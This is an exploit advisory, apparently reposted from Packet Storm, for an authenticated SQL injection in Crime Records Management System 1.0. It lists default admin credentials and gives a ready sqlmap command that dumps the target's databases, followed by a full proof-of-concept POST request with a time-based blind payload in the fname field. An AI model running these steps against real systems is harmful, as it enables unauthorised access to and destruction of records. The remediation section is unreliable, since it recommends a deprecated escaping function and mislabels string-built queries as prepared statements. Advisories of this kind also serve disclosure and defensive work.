Exploit for Crime Records Management System 1.0 SQL Injection

Name: Exploit for Crime Records Management System 1.0 SQL Injection
Rating: 5 (172 reviews)
2021-08-18 | CVSS 0.4
## https://sploitus.com/exploit?id=PACKETSTORM:163870
# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)  
# Date: 17/08/2021  
# Exploit Author: Davide 't0rt3ll1n0' Taraschi   
# Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya  
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html  
# Version: 1.0  
# Testeted on: Linux (Ubuntu 20.04) using LAMPP  
  
## Impact:  
An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server.   
  
## Description:   
All four parameters passed via POST are vulnerable:  
`fname` is vulnerable both to boolean-based blind and time-based blind SQLi  
`oname` is vulnerable both to boolean-based blind and time-based blind SQLi  
`username` is only vulnerable to time-based blind SQLi  
`status` is vulnerable both to boolean-based blind and time-based blind SQLi   
  
## Remediation:  
Here is the vulnerable code:  
  
if($status==''){  
mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());  
}  
if(!empty($status)){  
mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());  
}  
  
As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.  
To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.  
  
## Exploitation through sqlmap  
1) Log into the application (you can try the default creds 1111:admin123)  
2) Copy your PHPSESSID cookie  
3) Launch the following command:  
sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"  
replacing $target with your actual target and $phpsessid with the cookie that you had copied before  
  
## PoC:  
Request:  
POST /ghpolice/admin/savestaffedit.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 77  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/ghpolice/admin/user.php  
Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=  
  
And after 5 seconds we got:  
  
HTTP/1.1 200 OK  
Date: Tue, 17 Aug 2021 14:28:59 GMT  
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1  
X-Powered-By: PHP/7.4.22  
Content-Length: 1074  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
etc...